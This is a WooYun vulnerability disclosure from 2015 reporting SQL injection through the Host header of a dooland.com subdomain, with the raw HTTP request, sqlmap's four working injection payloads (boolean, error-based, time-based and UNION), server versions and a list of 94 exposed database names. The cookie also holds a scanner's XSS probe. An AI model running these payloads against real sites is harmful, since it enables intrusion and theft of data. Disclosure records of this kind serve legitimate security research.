当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143329

漏洞标题:读览天下某站存在SQL注入(涉及近百库)

相关厂商:dooland.com

漏洞作者: 深度安全实验室

提交时间:2015-09-25 19:01

修复时间:2015-10-09 04:02

公开时间:2015-10-09 04:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-25: 细节已通知厂商并且等待厂商处理中
2015-10-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

GET /enter/ HTTP/1.1
Host: baison.dooland.com*
Cookie: PHPSESSID=pdq7msm1a9aa9adcgdb128cn75; view_magid_all=%2C90254%2C90630%2C90660%2C90137%2C46199%2C; __utmt=1; __utma=206793600.1838345804.1443111007.1443111007.1443111007.1; __utmb=206793600.1.10.1443111007; __utmc=206793600; __utmz=206793600.1443111007.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Host存在注入

1.png


漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Host #1* ((custom) HEADER)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: baison.dooland.com' AND 8597=8597 AND 'fzPY'='fzPY
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: baison.dooland.com' AND (SELECT 9881 FROM(SELECT COUNT(*),CONCAT(0x717a716271,(SELECT (ELT(9881=9881,1))),0x716b6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lSOY'='lSOY
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: baison.dooland.com' OR SLEEP(5) AND 'GgYw'='GgYw
Type: UNION query
Title: MySQL UNION query (NULL) - 16 columns
Payload: -3343' UNION ALL SELECT CONCAT(0x717a716271,0x7175554a47426c446a53,0x716b6a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web application technology: PHP 5.4.33
back-end DBMS: MySQL 5.0
available databases [94]:
[*] A_Bank
[*] ads
[*] adstat
[*] adsystem
[*] ahvnet
[*] api_site_chinagames
[*] api_site_tttz
[*] asus
[*] bbappnet
[*] billwang
[*] business
[*] client
[*] collector
[*] common
[*] cover
[*] dayoo
[*] dongyou
[*] DoolandERP
[*] doolandmanager
[*] DownLoadInfoDB
[*] dudubao
[*] dudubao_bak
[*] dudubao_book
[*] dudubao_gztv
[*] dudubao_hd
[*] dudubao_test
[*] eben
[*] expand
[*] fhxxw
[*] gdvnet
[*] gdvnet2
[*] gdwap
[*] gxvnet
[*] gzvnet
[*] hzkzy
[*] ifeng
[*] information_schema
[*] ipad_adsys
[*] JIANBAO
[*] jigou
[*] jsvnet
[*] jxvnet
[*] kindle_caixin
[*] kuanzon
[*] lcbook
[*] lephone
[*] lib
[*] mag_pub
[*] magazine_upload
[*] mysql
[*] newlib
[*] news
[*] newspaper
[*] OEM
[*] opds_aldiko
[*] paycenter
[*] qinghua
[*] qqcaibei
[*] readstat
[*] ReadStat
[*] sctfds
[*] scvnet
[*] seo
[*] shop_car
[*] shoutu
[*] sina_book
[*] sina_mag_cooperation
[*] stat_dudubao
[*] stat_gxvnet
[*] stat_jxvnet
[*] stat_paihang
[*] suzhmobile
[*] system_check
[*] test
[*] test2
[*] tob_client
[*] ty189
[*] ty189_mail
[*] ty189_mail_hd
[*] ty189_mail_new
[*] ty189_mail_test
[*] ucenter
[*] unicom
[*] union
[*] vip_statistics
[*] vnet139
[*] wangyi163
[*] wap
[*] xjvnet
[*] ynvnet
[*] zazhishe
[*] zhongshan
[*] zhuanti
[*] zjvnet

修复方案:

版权声明:转载请注明来源 深度安全实验室@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-09 04:02

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无